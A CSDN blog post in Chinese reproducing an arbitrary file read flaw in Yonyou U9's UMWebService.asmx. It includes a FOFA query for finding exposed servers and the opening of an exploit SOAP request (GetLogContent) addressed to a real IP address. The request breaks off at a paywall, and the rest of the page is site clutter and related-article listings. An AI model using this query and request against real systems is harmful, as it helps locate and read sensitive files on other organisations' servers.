【漏洞复现】用友U9 UMWebService.asmx 任意文件读取漏洞

最新推荐文章于 2024-05-18 16:23:13 发布
最新推荐文章于 2024-05-18 16:23:13 发布
阅读量748 收藏 3
点赞数 21
分类专栏: 漏洞复现 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136422614
版权

0x01 产品简介

UMWebService.asmx是用友U9平台中的一个重要组件,它提供了Web服务接口,使得企业可以通过Web方式访问和调用用友U9平台的各种功能和数据。通过UMWebService.asmx,企业可以实现远程访问、数据交换、集成应用等场景,进一步提高企业的信息化水平和业务效率。

0x02 漏洞概述

用友U9多组织企业互联网应用平台UMWebService.asmx存在任意文件读取漏洞。攻击者可以通过发送特定的请求,利用该漏洞获取系统敏感文件。

0x03 测绘语句

测绘语句:FOFA:body="logo-u9.png"

0x04 漏洞复现

​
POST /u9/OnLine/UMWebService.asmx HTTP/1.1

Host: 120.77.222.42

Content-Type: text/xml; charset=utf-8

SOAPAction: "http://tempuri.org/GetLogContent"

Content-Length: 371

<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlso
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 21
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友-U9-UMWebService-文件读取
weixin_43567873的博客
03-05 52
用友-U9-UMWebService-文件读取
ajax跨域请求WebService.asmx
08-22
ajax跨域请求WebService.asmx,程序非常完美的跑起来了。辛苦了一下午整理出来的。怕的就是以后自己忘记了。
二进制读取.asmx.cs
07-03
二进制读取.asmx.cs FileStream readFileStream = new FileStream(binpath_array[i] + "\\" + rs["FileAddress"].ToString().Replace("\r\n", ""), FileMode.Open, FileAccess.Read); BinaryReader myBinRdr = new BinaryReader(readFileStream); byte[] rbyte = myBinRdr.ReadBytes(Convert.ToInt32(rs["FileBegin"].ToString())); rbyte = myBinRdr.ReadBytes(Convert.ToInt32(rs["FileLength"].ToString())); this_list.Add((object)rbyte); this_list.Add((object)rs["Photograde"].ToString()); this_list.Add((object)rs["PhotoSample"].ToString()); this_list.Add((object)rs["Videograde"].ToString()); this_list.Add((object)rs["VideoSample"].ToString()); this_list.Add((object)rs["VirusMatch"].ToString()); file_list.Add((object)this_list); readFileStream.Close(); myBinRdr.Close(); break;
用友U9-UMWebService.asmx存在文件读取漏洞
qq_36334672的博客
03-07 211
用友U9多组织企业互联网应用平台UMWebService.asmx存在任意文件读取漏洞。攻击者可以通过发送特定的请求,利用该漏洞获取系统敏感文件
玩转CodeQLpy之用友GRP-U8漏洞挖掘
C20220511的博客
03-09 1201
通过CodeQLpy可以辅助代码审计人员快速定位代码中的问题,目前支持对SprintBoot的jar包,SpringMVC的war包,直接下载的源码文件夹,maven项目源码等方式进行自动化代码审计,详细使用方式参考github。使用CodeQLpy可以直接从目标源码中找到上百个高危的漏洞,包括但不限于反序列化,任意文件上传,任意文件删除,SQL注入,SSRF,XSS等,如图2.2所示。利用CodeQLpy生成的数据库,结合CSV文件中保存的有结果的插件名称,可以在VS中复现漏洞查找过程。
用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘
wuli1024的博客
01-31 1253
近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至520+
漏洞复现用友-U9-UMWebService-文件读取
知黑而守白
02-29 332
用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。用友U9多组织企业互联网应用平台 UMWebService 接口存在文件读取漏洞。攻击者可以通过发送特定的请求,利用该漏洞获取系统敏感文件
java 调用webservice接口(.asmx).net
热门推荐
qq_34302802的博客
09-23 1万+
1、适应范围 拿到对接公司的一个接口,是用.net编写的webservice接口(.asmx),接口方会给到接口地址、方法名、参数及对方那边的返回值类型、测试数据。如果没有一下这些,那么就可以向客户那边索取。例(我这边接口方提供的数据): 2、拿到地址后访问,点击网址查看是否可以访问,并找到对应的方法(以下蓝色字体就是方法名:He'l'loWorld、QzjSaveEvent....
用友 U9 抛异常代码
weixin_30376163的博客
07-05 322
throw new Exception(“”) 转载于:https://www.cnblogs.com/Xanthus/p/11136906.html
用友 U9 常用的东西
weixin_30448685的博客
07-09 257
系统资源 数据字典 UI组件 UI参照组件 BE组件 BP组件 SV组件 转载于:https://www.cnblogs.com/Xanthus/p/11160851.html
php实现通过soap调用.Net的WebService asmx文件
10-20
主要介绍了php实现通过soap调用.Net的WebService asmx文件,结合实例形式分析了php使用soap实现WebService接口的调用技巧,需要的朋友可以参考下
java调用.asmx详细实例
12-14
JAVA调用.asmx详细实例,应用于java web 工程中。很细致哟
Web漏洞-任意文件读取漏洞
知世郎
09-01 301
原理:任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。一般任意文件读取漏洞可以读取配置信息甚至系统重要文件
任意文件读取漏洞详解
一个努力学习网安的小牛马
11-14 380
任意文件读取漏洞详解
VS2019新建WebService/Web服务/asmx并通过IIS实现发布和调用
BADAO_LIUMANG_QIZHI的博客
05-18 4627
对接第三方系统提供接口文档中显示为asmx接口访问接口返回数据格式为xml中的数据格式为json数据。需要在本地新建并模拟调试环境。
使用MPLS解决BGP的路由黑洞(详解)
最新发布
qq_64302290的博客
05-18 264
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
网络:HTTPS的加密
li209779的博客
05-18 1131
本文是对于https加密的知识总结以上就是我对于HTTPS的知识总结。
Service.asmx接口和http接口的区别
06-03
Service.asmx接口是一种基于SOAP协议的Web服务,而HTTP接口则是一种基于HTTP协议的Web服务。它们的区别主要体现在以下几个方面: 1. 数据传输格式:Service.asmx接口使用SOAP格式的XML文档进行数据传输,而HTTP接口则可以使用多种格式进行数据传输,包括JSON、XML、二进制等。 2. 调用方式:Service.asmx接口通常使用POST请求进行调用,而HTTP接口可以使用GET、POST、PUT、DELETE等不同的HTTP方法进行调用。 3. 传输效率:由于SOAP格式的XML文档比较冗长,因此Service.asmx接口传输效率相对较低,而HTTP接口则可以使用较为紧凑的数据格式,传输效率相对较高。 4. 跨平台支持:由于SOAP格式的XML文档需要使用SOAP协议进行解析,因此Service.asmx接口对于不同的平台和语言的支持存在一定的限制,而HTTP接口则可以在各种不同的平台和语言中进行调用。 总之,Service.asmx接口和HTTP接口都是Web服务的一种形式,它们的选择应该根据具体的应用场景和需求进行考虑。如果需要支持跨平台调用,或者需要较高的传输效率,建议使用HTTP接口;如果需要使用SOAP格式的XML文档进行数据传输,或者需要使用特定的Web服务协议,建议使用Service.asmx接口。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值